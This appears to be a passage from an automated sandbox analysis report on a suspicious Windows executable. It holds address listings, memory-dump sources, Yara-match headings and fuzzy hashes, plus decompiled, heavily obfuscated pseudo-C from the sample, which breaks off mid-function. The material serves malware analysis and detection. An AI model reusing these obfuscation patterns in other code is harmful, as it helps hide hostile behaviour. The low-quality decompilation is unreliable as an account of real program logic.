                                                                                                                                                    0x0041c0d1
                                                                                                                                                    0x0041c0d7
                                                                                                                                                    0x0041c0dd
                                                                                                                                                    0x0041c0e3
                                                                                                                                                    0x0041c0e9
                                                                                                                                                    0x0041c0ef
                                                                                                                                                    0x0041c0f5
                                                                                                                                                    0x0041c0f6
                                                                                                                                                    0x0041c0fb
                                                                                                                                                    0x0041c101
                                                                                                                                                    0x0041c102
                                                                                                                                                    0x0041c108
                                                                                                                                                    0x0041c109
                                                                                                                                                    0x0041c10f
                                                                                                                                                    0x0041c115
                                                                                                                                                    0x0041c121
                                                                                                                                                    0x0041c123
                                                                                                                                                    0x0041c12a
                                                                                                                                                    0x0041c131
                                                                                                                                                    0x0041c132
                                                                                                                                                    0x0041c138
                                                                                                                                                    0x0041c13d
                                                                                                                                                    0x0041c143
                                                                                                                                                    0x0041c149
                                                                                                                                                    0x0041c14f
                                                                                                                                                    0x0041c15b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041c161
                                                                                                                                                    0x0041c161
                                                                                                                                                    0x0041c168
                                                                                                                                                    0x0041c16e
                                                                                                                                                    0x0041c174
                                                                                                                                                    0x0041c174
                                                                                                                                                    0x0041c174
                                                                                                                                                    0x0041c17a
                                                                                                                                                    0x0041c17e
                                                                                                                                                    0x0041c185
                                                                                                                                                    0x0041c186
                                                                                                                                                    0x0041c18d
                                                                                                                                                    0x0041c193
                                                                                                                                                    0x0041c194
                                                                                                                                                    0x0041c199
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041c19f
                                                                                                                                                    0x0041c19f
                                                                                                                                                    0x0041c1a5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 47%
                                                                                                                                                    			E0041B973(signed int __eax, signed int __ebx, void* __ecx, void* __edx, signed int __esi) {
                                                                                                                                                    				signed char _t50;
                                                                                                                                                    				signed char _t51;
                                                                                                                                                    				signed char _t52;
                                                                                                                                                    				void* _t55;
                                                                                                                                                    				signed int _t60;
                                                                                                                                                    				signed int _t67;
                                                                                                                                                    				signed int _t69;
                                                                                                                                                    				void* _t72;
                                                                                                                                                    				signed int _t73;
                                                                                                                                                    				void* _t74;
                                                                                                                                                    				signed int _t78;
                                                                                                                                                    				signed int _t80;
                                                                                                                                                    				void* _t91;
                                                                                                                                                    				signed int _t94;
                                                                                                                                                    				signed int _t95;
                                                                                                                                                    
                                                                                                                                                    				_t78 = __esi;
                                                                                                                                                    				_push(_t94);
                                                                                                                                                    				_push(0xeaca12a9);
                                                                                                                                                    				_push(__esi);
                                                                                                                                                    				asm("sbb edx, 0x980b43cb");
                                                                                                                                                    				 *0x90a56105 =  *0x90a56105 << 0xbf;
                                                                                                                                                    				 *0x55055615 = _t80 &  *0xe8886ce9;
                                                                                                                                                    				asm("cmpsw");
                                                                                                                                                    				 *0x2abfd78d =  *0x2abfd78d << 0x50;
                                                                                                                                                    				_push(__esi);
                                                                                                                                                    				_push( *0xe55c1505);
                                                                                                                                                    				_pop(_t73);
                                                                                                                                                    				_t72 = __edx - 0xe1;
                                                                                                                                                    				asm("sbb esp, 0x5624b5de");
                                                                                                                                                    				asm("rol dword [0x500fd603], 0xc9");
                                                                                                                                                    				asm("rol byte [0x56ed7404], 0xc0");
                                                                                                                                                    				_push(__ecx);
                                                                                                                                                    				asm("sbb al, [0xaed2040c]");
                                                                                                                                                    				asm("rol byte [0xaff1040c], 0x3");
                                                                                                                                                    				asm("rcl byte [0xdf16050c], 0x5f");
                                                                                                                                                    				 *0x556209a =  *0x556209a & _t94;
                                                                                                                                                    				_push(__esi);
                                                                                                                                                    				 *0x562ac117 =  *0x562ac117 >> 0x53;
                                                                                                                                                    				 *0x62075628 =  *0x62075628 + __ecx - 1;
                                                                                                                                                    				asm("rcl dword [0x16c0035], 0x9a");
                                                                                                                                                    				_t95 = _t94 |  *0xb4074111;
                                                                                                                                                    				 *0x6df37307 =  *0x6df37307 | __esi;
                                                                                                                                                    				asm("sbb [0x410d0295], ecx");
                                                                                                                                                    				asm("sbb esi, [0xdd7ade07]");
                                                                                                                                                    				_t60 = ((__ebx ^  *0xb4e8040c) - 0x00000001 |  *0xc0ddbf05) + 0xf2;
                                                                                                                                                    				asm("cmpsw");
                                                                                                                                                    				 *0x4cbc5fc5 =  *0x4cbc5fc5 ^ __eax;
                                                                                                                                                    				asm("adc ebp, [0x87b2e21]");
                                                                                                                                                    				_t50 = __eax | 0x00000088;
                                                                                                                                                    				_pop(_t67);
                                                                                                                                                    				asm("sbb ch, [0xffeb4002]");
                                                                                                                                                    				_push( *0x2a087b29);
                                                                                                                                                    				_push(_t50);
                                                                                                                                                    				asm("sbb [0x2020558b], edi");
                                                                                                                                                    				if(_t60 == 0xf9) {
                                                                                                                                                    					__esp = __esp |  *0xab95097b;
                                                                                                                                                    					asm("sbb ecx, [0xcde41191]");
                                                                                                                                                    					__esp = __esp |  *0x953b5de;
                                                                                                                                                    					 *0x72f5ce65 =  *0x72f5ce65 | __edx;
                                                                                                                                                    					__esi =  *0x53bdddd9;
                                                                                                                                                    					__eflags = __edx -  *0x2c834209;
                                                                                                                                                    					 *0xc0c54984 =  *0xc0c54984 >> 0x4b;
                                                                                                                                                    					asm("scasb");
                                                                                                                                                    					__bl = __bl +  *0x1591e40a;
                                                                                                                                                    					__eax = __ebx;
                                                                                                                                                    					__ebx = 0xc5caaf0b;
                                                                                                                                                    					__esi =  *0x53bdddd9 + 1;
                                                                                                                                                    					 *0xcaad0b08 =  *0xcaad0b08 << 0xf4;
                                                                                                                                                    					__ebx = __edx;
                                                                                                                                                    					__eflags =  *0x74816a9b & __eax;
                                                                                                                                                    					_t35 = __eax;
                                                                                                                                                    					__eax =  *0xa6b9876e;
                                                                                                                                                    					 *0xa6b9876e = _t35;
                                                                                                                                                    					 *0x97e7fc08 = __dh;
                                                                                                                                                    					 *0x28fdef1f =  *0x28fdef1f >> 0xa2;
                                                                                                                                                    					if(__eflags == 0) {
                                                                                                                                                    						__ebp = __ebp &  *0x4d1c117b;
                                                                                                                                                    						 *0x651c7d28 =  *0x651c7d28 >> 0x58;
                                                                                                                                                    						 *0xb38b7ff8 & __edx =  *0x8cc02d26 & __esp;
                                                                                                                                                    						__ebp = __ebp - 1;
                                                                                                                                                    						__eflags =  *0x8414683d & __eax;
                                                                                                                                                    						__bl = __bl ^ 0x000000e5;
                                                                                                                                                    						asm("sbb eax, 0x4c73b48b");
                                                                                                                                                    						_push(__edi);
                                                                                                                                                    						__eax = __eax + 1;
                                                                                                                                                    						asm("lodsb");
                                                                                                                                                    						__ah = __ah |  *0x637dfea0;
                                                                                                                                                    						__edi = __edi - 1;
                                                                                                                                                    						__eax = __edx;
                                                                                                                                                    						asm("sbb eax, [0x9fbdd2fd]");
                                                                                                                                                    						 *0xff4c1512 =  *0xff4c1512 & __dh;
                                                                                                                                                    						__eflags = __esp & 0x5870fd29;
                                                                                                                                                    						_push(__eax);
                                                                                                                                                    						asm("sbb edi, [0xbc8154d6]");
                                                                                                                                                    						__cl = __cl |  *0xd6cb063c;
                                                                                                                                                    						__esi =  *0xaa0ba769 * 0x186d;
                                                                                                                                                    						__eflags = __al -  *0x27e11184;
                                                                                                                                                    						asm("rcl dword [0xa6c457cd], 0x1c");
                                                                                                                                                    						 *0x5783bb06 =  *0x5783bb06 ^ __edx;
                                                                                                                                                    						__esi = 1 +  *0xaa0ba769 * 0x186d;
                                                                                                                                                    						L1();
                                                                                                                                                    						__edx = __edx | 0xee2d0ce8;
                                                                                                                                                    						__ebp = 0x85c41ade;
                                                                                                                                                    						asm("adc ebp, [0x6da27394]");
                                                                                                                                                    						__edi = __edi & 0xed077698;
                                                                                                                                                    						__ebp = __esp;
                                                                                                                                                    						asm("rcl dword [0x4a3e8e11], 0xcd");
                                                                                                                                                    						__ecx = __ecx + 1;
                                                                                                                                                    						__eflags = __ecx;
                                                                                                                                                    						asm("rol dword [0x6140a816], 0xd5");
                                                                                                                                                    						if(__ecx < 0) {
                                                                                                                                                    							__eflags = __esp & 0x6cc03271;
                                                                                                                                                    							__dl = __dl - 0xe2;
                                                                                                                                                    							 *0x101951e7 =  *0x101951e7 ^ __al;
                                                                                                                                                    							__eflags = __ch & 0x00000084;
                                                                                                                                                    							 *0x9de267e7 = __ch;
                                                                                                                                                    							asm("lodsb");
                                                                                                                                                    							_push(__edi);
                                                                                                                                                    							asm("adc bl, 0x10");
                                                                                                                                                    							__eflags =  *0x1c11e089 - __esp;
                                                                                                                                                    							 *0x870cca3f =  *0x870cca3f ^ __esp;
                                                                                                                                                    							 *0x116e531a =  *0x116e531a << 0xa0;
                                                                                                                                                    							__eax = __eax & 0x98eb9e1f;
                                                                                                                                                    							__esp = __esp ^ 0x68f8086d;
                                                                                                                                                    							__bh = __bh | 0x0000001c;
                                                                                                                                                    							 *0x874d0c84 =  *0x874d0c84 + __dh;
                                                                                                                                                    							__ebp = 0xffffffff95ecdaff;
                                                                                                                                                    							_push(__eax);
                                                                                                                                                    							asm("sbb [0xa892949f], ebp");
                                                                                                                                                    							__cl = __cl +  *0xa674f814;
                                                                                                                                                    							__eax =  *0x9ce88969 * 0x2c1d;
                                                                                                                                                    							asm("rcr dword [0x208bcc39], 0x71");
                                                                                                                                                    							__ebp = 0xffffffff95ecdafe;
                                                                                                                                                    							asm("adc ah, [0x3182a810]");
                                                                                                                                                    							__ebx = 0xc5caaf0b &  *0x51f62fa3;
                                                                                                                                                    							__eflags = 0xc5caaf0b - 0x70f6753b;
                                                                                                                                                    							if(0xc5caaf0b >= 0x70f6753b) {
                                                                                                                                                    								_pop( *0xcd760278);
                                                                                                                                                    								 *0xc8802208 = __cl;
                                                                                                                                                    								__edi = __edi &  *0xd891d5bb;
                                                                                                                                                    								asm("movsb");
                                                                                                                                                    								__eax = __eax & 0x48c958fc;
                                                                                                                                                    								 *0xc577948e =  *0xc577948e >> 0x29;
                                                                                                                                                    								__esi =  *0x86de1065;
                                                                                                                                                    								__eflags =  *0x7144f609 & __esp;
                                                                                                                                                    								asm("rcl byte [0xd04f2b04], 0x5");
                                                                                                                                                    								__ebx =  *0x60288dea;
                                                                                                                                                    								__esi =  *0x86de1065 & 0x34ee4b03;
                                                                                                                                                    								 *0xe3d3d28a =  *0xe3d3d28a >> 0x43;
                                                                                                                                                    								__esp = __esp ^  *0xe176c864;
                                                                                                                                                    								 *0xd5bc8b8d =  *0xd5bc8b8d - __ecx;
                                                                                                                                                    								 *0xc848a818 =  *0xc848a818 << 9;
                                                                                                                                                    								asm("rcl dword [0x977cdddd], 1");
                                                                                                                                                    								__ah = __ah - 0x10;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				while(1) {
                                                                                                                                                    					L1:
                                                                                                                                                    					asm("ror dword [0x57b1f009], 0x69");
                                                                                                                                                    					_t95 = _t95 + 1;
                                                                                                                                                    					asm("rol dword [0x3935b90d], 0xf3");
                                                                                                                                                    					if((_t50 & 0x0000000a) >= 0) {
                                                                                                                                                    						continue;
                                                                                                                                                    					}
                                                                                                                                                    					L2:
                                                                                                                                                    					asm("scasb");
                                                                                                                                                    					_t74 =  *0x8a5d6305;
                                                                                                                                                    					asm("cmpsb");
                                                                                                                                                    					_push( *0xafe8b8c4);
                                                                                                                                                    					_t51 = _t50 |  *0x57bf634;
                                                                                                                                                    					asm("rcr byte [0x82141b7], 0x16");
                                                                                                                                                    					_push(_t78);
                                                                                                                                                    					asm("rcl dword [0x21ac910d], 0xe5");
                                                                                                                                                    					asm("sbb ch, [0xa3a45ad7]");
                                                                                                                                                    					asm("sbb [0xa61356b1], bh");
                                                                                                                                                    					_push(_t51);
                                                                                                                                                    					_push(_t74 + 0xba0876cf);
                                                                                                                                                    					_push( *0x32e74801);
                                                                                                                                                    					_t9 = _t78;
                                                                                                                                                    					_t78 =  *0x57856a35;
                                                                                                                                                    					 *0x57856a35 = _t9;
                                                                                                                                                    					asm("rol byte [0x8111ecb6], 0x92");
                                                                                                                                                    					 *0x550a0908 =  *0x550a0908 ^ _t51;
                                                                                                                                                    					_t73 =  *0xba69866a * 0xff7d;
                                                                                                                                                    					_push(_t60);
                                                                                                                                                    					_t52 = _t51 & 0x00000008;
                                                                                                                                                    					 *0xb6e71d0a = _t60;
                                                                                                                                                    					asm("rol byte [0x1761d412], 0x56");
                                                                                                                                                    					 *0xf083184 = _t52;
                                                                                                                                                    					asm("sbb esp, [0xdb89a2fb]");
                                                                                                                                                    					asm("cmpsw");
                                                                                                                                                    					asm("ror dword [0xe115810f], 0x13");
                                                                                                                                                    					 *0x740acff9 =  *0x740acff9 >> 0xe7;
                                                                                                                                                    					_t91 = ( *0x8e77569 * 0x0000da0a |  *0x3491b383) -  *0x830117eb;
                                                                                                                                                    					 *0x3b2bb32b =  *0x3b2bb32b - _t78;
                                                                                                                                                    					_t60 =  *0x364b2e6a * 0xb469;
                                                                                                                                                    					_t50 =  *0x1f7901fa;
                                                                                                                                                    					 *0x1f7901fa = _t52 - 1;
                                                                                                                                                    					 *0xd2bff8cf =  *0xd2bff8cf << 0;
                                                                                                                                                    					_t95 = (0xffffffff93ef5717 +  *0x3080086d |  *0xe34b4d3b) - 0x9ceffbdf;
                                                                                                                                                    					 *0xe88f63f7 =  *0xe88f63f7 ^ 0x90f9ad25;
                                                                                                                                                    					if( *0xe88f63f7 == 0) {
                                                                                                                                                    						while(1) {
                                                                                                                                                    							L1:
                                                                                                                                                    							asm("ror dword [0x57b1f009], 0x69");
                                                                                                                                                    							_t95 = _t95 + 1;
                                                                                                                                                    							asm("rol dword [0x3935b90d], 0xf3");
                                                                                                                                                    							if((_t50 & 0x0000000a) >= 0) {
                                                                                                                                                    								continue;
                                                                                                                                                    							}
                                                                                                                                                    							goto L2;
                                                                                                                                                    							do {
                                                                                                                                                    								do {
                                                                                                                                                    									do {
                                                                                                                                                    										goto L1;
                                                                                                                                                    									} while ((_t50 & 0x0000000a) >= 0);
                                                                                                                                                    									goto L2;
                                                                                                                                                    								} while ( *0xe88f63f7 == 0);
                                                                                                                                                    								goto L3;
                                                                                                                                                    							} while ( *0x3be3279f > 0);
                                                                                                                                                    							 *0x2babc577 =  *0x2babc577 - _t91;
                                                                                                                                                    							_t72 = _t72 +  *0x424a9db9;
                                                                                                                                                    							_t73 = _t73 + 0x30926d8e;
                                                                                                                                                    							 *0xce31028 =  *0xce31028 >> 0xf3;
                                                                                                                                                    							 *0xf0c0aff9 =  *0xf0c0aff9 - _t50;
                                                                                                                                                    							_t67 =  *0x7c91f760 * 0xaee;
                                                                                                                                                    							_push( *0xdc88d5bb);
                                                                                                                                                    							_t60 = _t60 & 0x00000063 ^  *0x9808efbb;
                                                                                                                                                    							_t78 = _t78 - 1;
                                                                                                                                                    							 *0xef44fb8f =  *0xef44fb8f + _t67;
                                                                                                                                                    							_pop( *0x6b431bd4);
                                                                                                                                                    							 *0xd3664a3b =  *0xd3664a3b + _t60;
                                                                                                                                                    							_t50 = _t50 ^  *0x98aa13f9;
                                                                                                                                                    							if(_t50 != 0) {
                                                                                                                                                    								continue;
                                                                                                                                                    							} else {
                                                                                                                                                    								asm("sbb ebx, [0xd521607a]");
                                                                                                                                                    								 *0xfc4edb89 =  *0xfc4edb89 >> 0xfa;
                                                                                                                                                    								asm("rcr dword [0xa6216009], 0x1c");
                                                                                                                                                    								_t69 = _t67 - 1;
                                                                                                                                                    								 *0xf40b53c0 = _t69;
                                                                                                                                                    								_t67 = _t69 ^  *0x86c89b15;
                                                                                                                                                    								_t95 = _t73;
                                                                                                                                                    								_push(_t50);
                                                                                                                                                    								asm("adc ebx, 0xb9213b81");
                                                                                                                                                    								_t60 = _t60 + 1;
                                                                                                                                                    								 *0xc5516339 =  *0xc5516339 - _t50;
                                                                                                                                                    								if( *0xc5516339 == 0) {
                                                                                                                                                    									continue;
                                                                                                                                                    								} else {
                                                                                                                                                    									asm("adc esp, 0xe90ea674");
                                                                                                                                                    									 *0xdc9265ee =  *0x1175f627;
                                                                                                                                                    									 *0x6bba0e61 = _t50;
                                                                                                                                                    									asm("adc edi, [0x9584be31]");
                                                                                                                                                    									_pop(_t55);
                                                                                                                                                    									asm("movsb");
                                                                                                                                                    									return _t55;
                                                                                                                                                    								}
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					L3:
                                                                                                                                                    					asm("adc [0x9c51b074], ecx");
                                                                                                                                                    					 *0xae61426 = _t73;
                                                                                                                                                    					asm("movsb");
                                                                                                                                                    					 *0xdd145d4 =  *0xdd145d4 - _t78;
                                                                                                                                                    					asm("adc esi, [0x8ff90139]");
                                                                                                                                                    					_t78 = _t78 + 2;
                                                                                                                                                    					 *0xb454e0e0 =  *0xb454e0e0 - _t72;
                                                                                                                                                    					asm("adc [0xa41e48bb], esi");
                                                                                                                                                    					_pop(_t73);
                                                                                                                                                    					 *0x493bdb32 =  *0x493bdb32 >> 0x39;
                                                                                                                                                    					L1();
                                                                                                                                                    					asm("ror dword [0xb221b2e8], 0xc5");
                                                                                                                                                    					_t50 = _t50 & 0x0000001c;
                                                                                                                                                    					asm("adc ebp, [0x7ac35861]");
                                                                                                                                                    					 *0xf7154f3b =  *0xf7154f3b - 0x90f9ad25;
                                                                                                                                                    					_t67 = _t67 + 1;
                                                                                                                                                    					 *0xa24e3c15 =  *0xa24e3c15 - _t72;
                                                                                                                                                    					 *0x3be3279f =  *0x3be3279f & _t60;
                                                                                                                                                    					asm("sbb [0x9042f2c2], ebx");
                                                                                                                                                    					L1:
                                                                                                                                                    					asm("ror dword [0x57b1f009], 0x69");
                                                                                                                                                    					_t95 = _t95 + 1;
                                                                                                                                                    					asm("rol dword [0x3935b90d], 0xf3");
                                                                                                                                                    				}
                                                                                                                                                    			}


















                                                                                                                                                    0x0041bbc3
                                                                                                                                                    0x0041bbc9
                                                                                                                                                    0x0041bbca
                                                                                                                                                    0x0041bbd0
                                                                                                                                                    0x0041bbd6
                                                                                                                                                    0x0041bbe0
                                                                                                                                                    0x0041bbe7
                                                                                                                                                    0x0041bbe8
                                                                                                                                                    0x0041bbee
                                                                                                                                                    0x0041bbf4
                                                                                                                                                    0x0041bbfa
                                                                                                                                                    0x0041bc00
                                                                                                                                                    0x0041bc06
                                                                                                                                                    0x0041bc0c
                                                                                                                                                    0x0041bc12
                                                                                                                                                    0x0041bc13
                                                                                                                                                    0x0041bc18
                                                                                                                                                    0x0041bc1f
                                                                                                                                                    0x0041bc25
                                                                                                                                                    0x0041bc2b
                                                                                                                                                    0x0041bc32
                                                                                                                                                    0x0041bc38
                                                                                                                                                    0x0041bc3e
                                                                                                                                                    0x0041bc45
                                                                                                                                                    0x0041bc4b
                                                                                                                                                    0x0041bc51
                                                                                                                                                    0x0041bc58
                                                                                                                                                    0x0041bc5e
                                                                                                                                                    0x0041bc5e
                                                                                                                                                    0x0041bbfa
                                                                                                                                                    0x0041bb79
                                                                                                                                                    0x0041bad4
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4ad
                                                                                                                                                    0x0041b4b6
                                                                                                                                                    0x0041b4bd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041b4bf
                                                                                                                                                    0x0041b4d8
                                                                                                                                                    0x0041b4d9
                                                                                                                                                    0x0041b4da
                                                                                                                                                    0x0041b4e2
                                                                                                                                                    0x0041b4e8
                                                                                                                                                    0x0041b4ee
                                                                                                                                                    0x0041b4f5
                                                                                                                                                    0x0041b4f6
                                                                                                                                                    0x0041b503
                                                                                                                                                    0x0041b509
                                                                                                                                                    0x0041b515
                                                                                                                                                    0x0041b517
                                                                                                                                                    0x0041b534
                                                                                                                                                    0x0041b544
                                                                                                                                                    0x0041b544
                                                                                                                                                    0x0041b544
                                                                                                                                                    0x0041b54a
                                                                                                                                                    0x0041b551
                                                                                                                                                    0x0041b557
                                                                                                                                                    0x0041b561
                                                                                                                                                    0x0041b57a
                                                                                                                                                    0x0041b57d
                                                                                                                                                    0x0041b583
                                                                                                                                                    0x0041b58a
                                                                                                                                                    0x0041b58f
                                                                                                                                                    0x0041b595
                                                                                                                                                    0x0041b5aa
                                                                                                                                                    0x0041b5b1
                                                                                                                                                    0x0041b5b8
                                                                                                                                                    0x0041b5c3
                                                                                                                                                    0x0041b5c9
                                                                                                                                                    0x0041b5d3
                                                                                                                                                    0x0041b5d3
                                                                                                                                                    0x0041b5df
                                                                                                                                                    0x0041b5e6
                                                                                                                                                    0x0041b5ec
                                                                                                                                                    0x0041b5f2
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4ad
                                                                                                                                                    0x0041b4b6
                                                                                                                                                    0x0041b4bd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b666
                                                                                                                                                    0x0041b66c
                                                                                                                                                    0x0041b678
                                                                                                                                                    0x0041b67e
                                                                                                                                                    0x0041b68b
                                                                                                                                                    0x0041b694
                                                                                                                                                    0x0041b69e
                                                                                                                                                    0x0041b6a4
                                                                                                                                                    0x0041b6aa
                                                                                                                                                    0x0041b6ab
                                                                                                                                                    0x0041b6b7
                                                                                                                                                    0x0041b6bd
                                                                                                                                                    0x0041b6c9
                                                                                                                                                    0x0041b6cf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041b6d5
                                                                                                                                                    0x0041b6d5
                                                                                                                                                    0x0041b6e1
                                                                                                                                                    0x0041b6ee
                                                                                                                                                    0x0041b6f5
                                                                                                                                                    0x0041b6f6
                                                                                                                                                    0x0041b6fc
                                                                                                                                                    0x0041b703
                                                                                                                                                    0x0041b704
                                                                                                                                                    0x0041b70b
                                                                                                                                                    0x0041b711
                                                                                                                                                    0x0041b712
                                                                                                                                                    0x0041b718
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041b71e
                                                                                                                                                    0x0041b71e
                                                                                                                                                    0x0041b730
                                                                                                                                                    0x0041b736
                                                                                                                                                    0x0041b73c
                                                                                                                                                    0x0041b74f
                                                                                                                                                    0x0041b750
                                                                                                                                                    0x0041b75b
                                                                                                                                                    0x0041b75b
                                                                                                                                                    0x0041b718
                                                                                                                                                    0x0041b6cf
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b5f8
                                                                                                                                                    0x0041b5f8
                                                                                                                                                    0x0041b5fe
                                                                                                                                                    0x0041b604
                                                                                                                                                    0x0041b605
                                                                                                                                                    0x0041b612
                                                                                                                                                    0x0041b618
                                                                                                                                                    0x0041b619
                                                                                                                                                    0x0041b61f
                                                                                                                                                    0x0041b625
                                                                                                                                                    0x0041b626
                                                                                                                                                    0x0041b62d
                                                                                                                                                    0x0041b632
                                                                                                                                                    0x0041b639
                                                                                                                                                    0x0041b63b
                                                                                                                                                    0x0041b641
                                                                                                                                                    0x0041b64d
                                                                                                                                                    0x0041b64e
                                                                                                                                                    0x0041b654
                                                                                                                                                    0x0041b65a
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4ad
                                                                                                                                                    0x0041b4b6
                                                                                                                                                    0x0041b4b6

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e85afe9d0a3f83d0d30308f1902915e454edcde852a2ec0c1fad34278f3be33e
                                                                                                                                                    • Instruction ID: 17a0f89b93eae37d0cd4ebd80b91ab01bbc7ed9a934e197e5ba388a399d4abe5
                                                                                                                                                    • Opcode Fuzzy Hash: e85afe9d0a3f83d0d30308f1902915e454edcde852a2ec0c1fad34278f3be33e
                                                                                                                                                    • Instruction Fuzzy Hash: DCD1A732A18785CFD706DF38D88AB423FB5F742320B08825ED9A2931D2D7742166DF99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 57%
                                                                                                                                                    			E0041C1FB(signed int __eax, signed int __ebx, signed int __edx, void* __esi) {
                                                                                                                                                    				signed char _t37;
                                                                                                                                                    				signed char _t38;
                                                                                                                                                    				signed char _t39;
                                                                                                                                                    				void* _t42;
                                                                                                                                                    				signed int _t44;
                                                                                                                                                    				signed int _t48;
                                                                                                                                                    				signed int _t50;
                                                                                                                                                    				signed char _t53;
                                                                                                                                                    				signed int _t54;
                                                                                                                                                    				void* _t55;
                                                                                                                                                    				signed int _t62;
                                                                                                                                                    				void* _t74;
                                                                                                                                                    				void* _t79;
                                                                                                                                                    
                                                                                                                                                    				_t48 =  *0xa30d76b7 |  *0xe66b112f;
                                                                                                                                                    				_t44 = __ebx | 0x0000001c;
                                                                                                                                                    				_t53 = __edx ^ 0x00000082;
                                                                                                                                                    				 *0xcdfa6e85 = _t48;
                                                                                                                                                    				asm("rcl dword [0x6edb70d9], 0xe");
                                                                                                                                                    				_t37 =  *0x9e1e1a9e;
                                                                                                                                                    				 *0x9e1e1a9e = __eax |  *0x56c7d1d3;
                                                                                                                                                    				asm("movsw");
                                                                                                                                                    				_pop(_t79);
                                                                                                                                                    				asm("sbb [0x7be94afb], ebp");
                                                                                                                                                    				asm("adc ecx, [0x2457920f]");
                                                                                                                                                    				_push( *0x27081001);
                                                                                                                                                    				_t62 =  *0x92289469 * 0xbd0f;
                                                                                                                                                    				 *0x7915ac9 =  *0x7915ac9 << 0xac;
                                                                                                                                                    				if( *0x7915ac9 > 0) {
                                                                                                                                                    					__ebp =  *0x6a60807e * 0x5ead;
                                                                                                                                                    					asm("sbb [0x92305be7], dl");
                                                                                                                                                    					__ecx =  *0x74d7b0e;
                                                                                                                                                    					if(__ebp >= 0) {
                                                                                                                                                    						__edi =  *0xe0d0017c * 0xe4bc;
                                                                                                                                                    						asm("sbb ecx, 0xfd7773d4");
                                                                                                                                                    						 *0xa5a71b61 =  *0xa5a71b61 & __ebx;
                                                                                                                                                    						if( *0xa5a71b61 < 0) {
                                                                                                                                                    							__ecx =  *0x36c3ef79;
